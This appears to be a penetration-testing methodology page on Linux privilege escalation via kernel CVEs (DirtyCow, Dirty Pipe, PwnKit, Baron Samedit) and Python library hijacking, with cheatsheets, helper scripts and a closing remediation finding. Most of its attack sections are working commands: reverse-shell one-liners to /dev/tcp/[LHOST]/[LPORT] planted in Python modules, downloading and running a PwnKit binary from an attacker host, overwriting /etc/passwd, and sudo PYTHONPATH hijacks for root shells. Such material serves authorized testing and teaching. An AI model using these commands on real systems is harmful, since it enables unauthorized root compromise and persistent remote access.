🛡️ Methodology Checklist
- Kernel version: `uname -r`
- Search exploits: `searchsploit linux kernel [version]`
- Check PwnKit: `pkexec` is SUID-root and unpatched (CVE-2021-4034). The SUID bit alone is not proof, fixed builds keep it, so compare the polkit package version against the distro advisory.
- Compile the exploit NATIVELY on the target, not cross-compiled
- Check Python library path order: `python3 -c "import sys; print(sys.path)"`
- Find world-writable .py libraries imported by root-run scripts
- Check for `SETENV` in sudoers on a python interpreter entry
- If SETENV: `sudo PYTHONPATH=/tmp python3 [script]` with a malicious module at /tmp
🎯 Operational Context
Use when: No other privesc path found and kernel version is old — check for applicable kernel CVEs and Python-based privilege escalation techniques.
Think Dumber First: uname -a for kernel version. Search exploit-db.com for Linux [KERNEL_VERSION] local privilege escalation. Common targets: Dirty Cow (2.6.22-4.8.3), overlayfs exploits. Compile on matching architecture.
Skip when: Kernel is current — kernel exploit development and targeting is complex and risky; kernel exploits can crash the system.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| uname -a | Get kernel version for CVE lookup |
| cat /etc/os-release | OS/distro version — affects exploit compatibility |
| searchsploit "linux kernel [VERSION]" | Find kernel exploits |
| searchsploit -m [EDB-ID] | Copy exploit to current directory |
| gcc [exploit.c] -o exploit | Compile kernel exploit natively ON TARGET |
| ./exploit | Execute compiled kernel exploit |
| python3 -c 'import sys; print(sys.path)' | Show Python sys.path load order (the '' entry is the cwd and exists only for -c / the REPL; for a script run, sys.path[0] is the script's own directory) |
| pip3 show [MODULE] | Find module install location |
| ls -ld $(python3 -c 'import sys; print(" ".join(p for p in sys.path if p))') | Check which sys.path dirs are writable; only an entry that comes before the real module's location can shadow it |
| find / -name [MODULE].py 2>/dev/null | Find Python module file location |
| ls -la [MODULE_PATH] | Check if module file is world-writable |
| sudo -l \| grep SETENV | Check for SETENV in sudoers — allows PYTHONPATH override |
| sudo PYTHONPATH=/tmp [SUDO_BINARY] | Inject hijack path if SETENV+NOPASSWD |
| find / -path /proc -prune -o -name "*.py" -writable -print 2>/dev/null | Find writable Python files |
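The Python rows above, and the three hijacking methods in the Deep Dive below, all rest on one rule: the earliest sys.path entry that contains a matching file supplies the module. The following is an added example, not code from the page: it builds a throwaway layout under a temp dir (an "installed" copy of a module named psutil, as on the page; a script that imports it; an attacker-owned copy), then runs the script in a fresh interpreter (standing in for the sudo/cron run) under each condition and reports which copy was imported. All paths and contents are constructed; nothing is installed on the host.

```python
import os
import subprocess
import sys
import tempfile

MODULE = "psutil"  # module name reused from the page's examples; nothing is installed on the host


def build_demo(root):
    """Constructed layout under a temp dir:
    root/site/psutil/__init__.py   stand-in for the installed (dist-packages) copy
    root/opt/script.py             the script root would run; it does `import psutil`
    root/hijack/psutil.py          attacker-controlled module
    """
    p = {k: os.path.join(root, k) for k in ("site", "opt", "hijack")}
    os.makedirs(os.path.join(p["site"], MODULE))
    os.makedirs(p["opt"])
    os.makedirs(p["hijack"])
    with open(os.path.join(p["site"], MODULE, "__init__.py"), "w") as f:
        f.write("WHO = 'real'\n")
    with open(os.path.join(p["opt"], "script.py"), "w") as f:
        f.write(f"import {MODULE}\nprint({MODULE}.WHO)\n")
    with open(os.path.join(p["hijack"], MODULE + ".py"), "w") as f:
        f.write("WHO = 'hijacked'\n")
    return p


def run_script(p, pythonpath, cwd=None):
    """Run opt/script.py in a fresh interpreter (stands in for the sudo/cron
    run) and return which copy of the module it imported. PYTHONPATH entries
    are placed after sys.path[0] (the script's own directory) and before the
    interpreter's default directories."""
    env = dict(os.environ, PYTHONPATH=os.pathsep.join(pythonpath))
    env.pop("PYTHONSAFEPATH", None)  # 3.11+ knob that would suppress sys.path[0]
    out = subprocess.run(
        [sys.executable, os.path.join(p["opt"], "script.py")],
        env=env, cwd=cwd or p["opt"], capture_output=True, text=True, check=True,
    )
    return out.stdout.strip()


def demo():
    with tempfile.TemporaryDirectory() as root:
        p = build_demo(root)
        r = {}
        # Baseline: only the installed copy is reachable.
        r["baseline"] = run_script(p, [p["site"]])
        # The cwd is NOT on sys.path for a script run, so running from the
        # attacker's directory hijacks nothing ('' exists only for -c / REPL).
        r["cwd_only"] = run_script(p, [p["site"]], cwd=p["hijack"])
        # Method 3: PYTHONPATH (what SETENV lets through sudo) comes before
        # the installed copy, so the earlier entry wins.
        r["pythonpath"] = run_script(p, [p["hijack"], p["site"]])
        # Method 1: the installed copy itself is writable; append a payload.
        # Later assignments win, and the module's original code still runs.
        with open(os.path.join(p["site"], MODULE, "__init__.py"), "a") as f:
            f.write("WHO = 'appended'\n")
        r["appended"] = run_script(p, [p["site"]])
        # Method 2: a writable script directory is sys.path[0] and shadows
        # everything, PYTHONPATH included.
        with open(os.path.join(p["opt"], MODULE + ".py"), "w") as f:
            f.write("WHO = 'scriptdir'\n")
        r["scriptdir"] = run_script(p, [p["hijack"], p["site"]])
        return r


if __name__ == "__main__":
    for case, who in demo().items():
        print(f"{case:11} -> imported {who}")
```

The cwd_only case is the one that trips people up: `cd` into a directory holding a fake module does nothing for `sudo python3 /opt/script.py`, because the script's directory, not the cwd, is sys.path[0]. The practical hijack points are, in order of precedence, a writable script directory, a PYTHONPATH you can set (SETENV), and a writable installed copy.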
🔬 Deep Dive & Workflow
Kernel Exploit Workflow
```bash
# Step 1: Identify kernel
uname -a
# Linux target 4.4.0-116-generic #140-Ubuntu SMP x86_64 GNU/Linux
# Step 2: Search for exploits
searchsploit "linux kernel 4.4.0"
searchsploit "linux local privilege escalation"
# Step 3: Download exploit
searchsploit -m 44298 # or wget from ExploitDB
# Read the PoC header first: EDB entries state the distro/kernel build they were tested on
# CRITICAL: Compile ON TARGET, not on Kali
# Architecture mismatch and GLIBC version differences will cause crashes
# Only pre-compile if target has no gcc
# Step 4: Transfer source to target if needed
python3 -m http.server 80 # attacker
wget http://[LHOST]/exploit.c -O /tmp/exploit.c # target
# Step 5: Compile and run on target
cd /tmp
gcc exploit.c -o exploit
./exploit
```
Why compile natively: kernel exploits are tied to the target architecture (word size, syscall numbers, calling conventions), to build-specific kernel struct offsets or symbol addresses, and, for their user-space part, to the glibc the binary was linked against. A binary built on Kali against a newer glibc often refuses to start on the target (missing GLIBC_x.y symbol) or segfaults; building on the target with its own headers and libc removes that whole class of failure. If the target has no compiler, build on a matching distro and version in a VM and link statically (gcc -static).
Key Kernel CVEs
| CVE | Kernel Range | Name | Notes |
|---|---|---|---|
| CVE-2016-5195 | < 4.8.3 | DirtyCow | Race condition in CoW; very reliable |
| CVE-2021-4034 | All pre-patch | PwnKit | pkexec SUID — user-space not kernel |
| CVE-2022-0847 | 5.8 – 5.16.11 | Dirty Pipe | Pipe overwrite arbitrary files |
| CVE-2021-3156 | sudo < 1.9.5p2 | Baron Samedit | Heap overflow in sudo |
| CVE-2017-16995 | 4.4 – 4.14 | eBPF | eBPF verifier bypass |
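A first-pass triage of the version strings collected above against the ranges in this table, as an added example (not code from the page). It parses `uname -r` and `sudo --version` output, drops distro suffixes, and reports candidates; the ranges are the table's upstream numbers, so a hit is a candidate to confirm against the distro's package changelog, not a verdict (distro kernels such as 4.4.0-NNN backport fixes without changing the upstream digits). The sudo range is the one from the sudo advisory (legacy 1.8.2 to 1.8.31p2 and stable 1.9.0 to 1.9.5p1); function names and the sample inputs are constructed.

```python
import re

# Ranges from the table above, as (cve, name, first_vulnerable, first_fixed);
# the upper bound is exclusive (the release that shipped the fix). Upstream
# numbers only: distro kernels backport fixes without changing these digits,
# so a hit here is a candidate to confirm, not a verdict.
KERNEL_CVES = [
    ("CVE-2016-5195", "DirtyCow", (2, 6, 22), (4, 8, 3)),
    ("CVE-2017-16995", "eBPF verifier", (4, 4, 0), (4, 15, 0)),  # table: 4.4 - 4.14
    ("CVE-2022-0847", "Dirty Pipe", (5, 8, 0), (5, 16, 11)),
]

_VER = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?")


def parse_version(s):
    """'4.4.0-116-generic' -> (4, 4, 0, 0); '1.8.31p2' -> (1, 8, 31, 2).
    Anything after the numeric part (distro suffixes) is ignored."""
    m = _VER.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(x) if x else 0 for x in m.groups())


def kernel_candidates(uname_r):
    """CVE ids from the table whose upstream range contains this kernel."""
    v = parse_version(uname_r)[:3]
    return [cve for cve, _, lo, hi in KERNEL_CVES if lo <= v < hi]


def sudo_vulnerable(version):
    """CVE-2021-3156 (Baron Samedit): sudo 1.8.2-1.8.31p2 and 1.9.0-1.9.5p1
    per the sudo advisory; the table's '< 1.9.5p2' is the stable-branch bound."""
    v = parse_version(version)
    return (1, 8, 2, 0) <= v <= (1, 8, 31, 2) or (1, 9, 0, 0) <= v < (1, 9, 5, 2)


def triage(uname_r, sudo_version=None):
    """Map candidate CVE -> name for the kernel (and sudo, if a version is given)."""
    names = {cve: name for cve, name, _, _ in KERNEL_CVES}
    found = {cve: names[cve] for cve in kernel_candidates(uname_r)}
    if sudo_version and sudo_vulnerable(sudo_version):
        found["CVE-2021-3156"] = "Baron Samedit"
    return found


if __name__ == "__main__":
    # Constructed sample: the uname line from the workflow above plus a Xenial-era sudo.
    print(triage("4.4.0-116-generic", "1.8.16"))
```

For sudo specifically there is a definitive runtime check that does not depend on version strings: `sudoedit -s /` prints `sudoedit: /: not a regular file` on a vulnerable build and a usage message on a patched one. PwnKit is left out of the triage on purpose: polkit fixes were backported under unchanged upstream versions, so the package changelog is the only reliable source.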
```bash
# DirtyCow (FireFart dirty.c variant, the one built with -lcrypt) — adds a root-UID user to /etc/passwd
gcc -pthread /tmp/dirtycow.c -o /tmp/dc -lcrypt
./dc [NEW_PASS]
# → /etc/passwd rewritten with user "firefart" (uid 0) and the given password; original saved to /tmp/passwd.bak
su firefart
# Restore afterwards: mv /tmp/passwd.bak /etc/passwd
# Dirty Pipe (CVE-2022-0847) — overwrite bytes inside a read-only file through the page cache
# Reference PoC usage: ./dirtypipe TARGET_FILE OFFSET DATA. The write is in place (it does not insert),
# cannot start at offset 0 or a page boundary, and cannot cross a page; existing bytes at OFFSET are
# clobbered, so back up the target first and pick OFFSET/DATA so the resulting line is well-formed
./dirtypipe /etc/passwd 1 "root2:[HASH]:0:0:root:/root:/bin/bash\n"
su root2
# PwnKit (CVE-2021-4034) — pkexec (polkit), user-space not kernel; most distros shipped fixes in Jan 2022
ls -l "$(which pkexec)" # -rwsr-xr-x → SUID-root → exploitable only if unpatched
# Fixed builds are SUID too: confirm the polkit package version against the distro advisory
# (dpkg -s policykit-1 on Debian/Ubuntu, rpm -q polkit on RHEL/Fedora)
# Self-contained PoC (e.g. ly4k/PwnKit single binary, or berdav/CVE-2021-4034)
wget http://[LHOST]/PwnKit -O /tmp/PwnKit && chmod +x /tmp/PwnKit && /tmp/PwnKit
# → instant root shell, no compiler needed
```
Python Library Hijacking — Method 1: World-Writable Module
```bash
# Find imported module file
pip3 show psutil # → Location: /usr/local/lib/python3.8/dist-packages
# Check if module .py is world-writable
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
# → -rw-rw-rw- ← writable
# Append payload to module (appending keeps the module's real code intact, so the root script keeps working)
echo "import os; os.system('bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1')" >> /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
# Trigger when script runs (especially as root via cron/sudo)
# Note: the import blocks until the shell exits, so the script itself stalls while you hold the shell
```
Python Library Hijacking — Method 2: sys.path Priority
```bash
# Check sys.path order
python3 -c 'import sys; print(sys.path)'
# → ['', '/usr/lib/python38.zip', '/usr/lib/python3.8', '/home/user']
# '' = current directory, but it is present ONLY for python3 -c and the REPL.
# When python3 /opt/script.py runs, sys.path[0] is /opt (the script's directory), not the cwd,
# so cd'ing into a directory that holds a fake module does nothing for a script run.
# Resolution order for a script: script dir → PYTHONPATH entries → the dirs listed above.
# The hijack point is any writable directory that precedes the real module's location.
# Find what module the script imports
head -20 /opt/script.py # → import psutil
# Check the script directory and the other sys.path entries for write access
ls -ld /opt $(python3 -c 'import sys; print(" ".join(p for p in sys.path if p))')
# Create the fake module in the earliest writable directory (here: the script's own dir)
cat > /opt/psutil.py << 'EOF'
import os
os.system("bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1")
EOF
# Trigger: every run of the script now resolves psutil from /opt first
sudo python3 /opt/script.py
# (If /opt is writable you can usually edit script.py directly; shadowing matters when the script
#  itself is root-owned but its directory, or an earlier sys.path entry, is writable.)
```
Python Library Hijacking — Method 3: SETENV + PYTHONPATH
```bash
# sudo -l shows:
# (root) SETENV: NOPASSWD: /usr/bin/python3 /opt/script.py
# Create hijack module in /tmp
cat > /tmp/psutil.py << 'EOF'
import os
os.setuid(0)   # already uid 0 under sudo; harmless, kept for the cap_setuid variant
os.system("/bin/bash")
EOF
# Override PYTHONPATH: sudo's env_reset normally strips it, SETENV lets the caller's value through
sudo PYTHONPATH=/tmp /usr/bin/python3 /opt/script.py
# → PYTHONPATH entries sit right after the script's directory in sys.path → /tmp/psutil.py loads
#   instead of the dist-packages copy → root shell
```
When Kernel Exploits Are Last Resort
```bash
# Kernel exploits can:
# - Panic/crash the system
# - Leave artifacts in kernel logs
# - Require reboot if they crash
# Always try first:
# 1. sudo -l → GTFOBins
# 2. SUID binaries → GTFOBins
# 3. Cron/service abuse
# 4. Credential hunting → reuse
# 5. NFS / Library hijacking
# Then: kernel exploits as final option
# LinPEAS kernel section:
# → [+] Sudo version → baron samedit
# → [+] Kernel exploits suggestions
# (suggesters match on version strings only; confirm against the distro changelog before running anything)
```
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Kernel exploit crashes system | Target kernel mismatch | Only use kernel exploits as last resort; verify exact kernel version match; test in lab first |
| Compilation fails on target | No compiler or wrong gcc | Build on the attack box for the same architecture and link statically: gcc -static -o exploit exploit.c (add -m32 for 32-bit targets); transfer the binary; expect glibc or struct-offset mismatches to show up as crashes |
| Dirty Cow exploit fails | Kernel patched or wrong version | Dirty Cow works on 2.6.22 - 4.8.3 (CVE-2016-5195); check kernel version exactly |
| Python suid exploit not working | Python not SUID | SUID python is extremely rare; verify with ls -la $(which python3), and also check file capabilities with getcap -r / 2>/dev/null: cap_setuid on a python binary is the more common misconfiguration and gives the same os.setuid(0) path |
| exploit-db PoC requires libraries | Missing dependencies | Try static compile: gcc -static -o exploit exploit.c; or use self-contained PoC |
📝 Reporting Trigger
Finding Title: Vulnerable Kernel Version Exploitable for Local Privilege Escalation
Impact: An unpatched kernel vulnerability (e.g., CVE-2016-5195 Dirty Cow) allows any local user to escalate to root by exploiting a race condition in the kernel memory management subsystem, achieving complete system compromise.
Root Cause: Operating system kernel not updated with security patches; no automated kernel update process, or prolonged maintenance-window delays.
Recommendation: Apply kernel security updates on a defined schedule and enable automatic security updates for kernel packages (the same discipline applies to sudo and polkit, which carry the user-space findings in this section). Consider kernel hardening (grsecurity, PaX) for sensitive systems. Track kernel version exposure in the vulnerability management platform.